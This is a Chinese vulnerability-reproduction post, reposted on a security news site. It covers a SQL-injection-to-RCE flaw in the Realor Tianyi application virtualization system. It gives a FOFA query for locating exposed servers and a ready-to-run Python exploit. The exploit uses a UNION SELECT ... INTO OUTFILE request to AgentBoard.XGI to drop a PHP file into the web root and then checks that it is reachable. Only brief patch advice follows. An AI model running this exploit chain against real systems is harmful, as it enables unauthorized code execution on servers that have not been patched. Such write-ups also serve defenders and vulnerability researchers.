【漏洞复现】瑞友天翼应用虚拟化系统RCE漏洞复现

admin 2024年1月31日19:51:23评论82 views字数 874阅读2分54秒阅读模式

 

一、漏洞描述

瑞友天翼应用虚拟化系统是具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台,该系统存在远程代码执行漏洞,恶意攻击者可以通过此漏洞进行任意执行操作

二、漏洞影响

影响范围:5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1

不受影响:瑞友天翼应用虚拟化系统 >= 7.0.3.1

三、漏洞复现

1、fofa语法查找:title=“瑞友天翼-应用虚拟化系统”

【漏洞复现】瑞友天翼应用虚拟化系统RCE漏洞复现

2、使用漏洞检测脚本进行漏洞验证:

'''SQL注入-->RCE  EXP瑞友天翼应用虚拟化系统RCE漏洞影响版本5.x<=version<=7.0.2.1安全版本version>=7.0.3.1'''import requestsimport sysurl = sys.argv[1]payload="/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C1.php%22+--+-&cmd=UserLogin"repose = requests.get(url=url+payload)if repose.status_code ==200:    a = url + '1.php'    b = requests.get(url=a)    if b.status_code == 200:        print('[+] 漏洞存在,验证地址: {}1.php '.format(url))

3、验证使用结果

【漏洞复现】瑞友天翼应用虚拟化系统RCE漏洞复现

进行访问验证地址,成功返回配置信息

【漏洞复现】瑞友天翼应用虚拟化系统RCE漏洞复现

四、修复建议:

1、厂商尚未提供漏洞修补方案,请关注厂商主页及时更新:http://www.realor.cn;

2、非必要建议不要把该系统暴漏于公网。

原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】瑞友天翼应用虚拟化系统RCE漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月31日19:51:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】瑞友天翼应用虚拟化系统RCE漏洞复现https://cn-sec.com/archives/2451786.html

发表评论

匿名网友 填写信息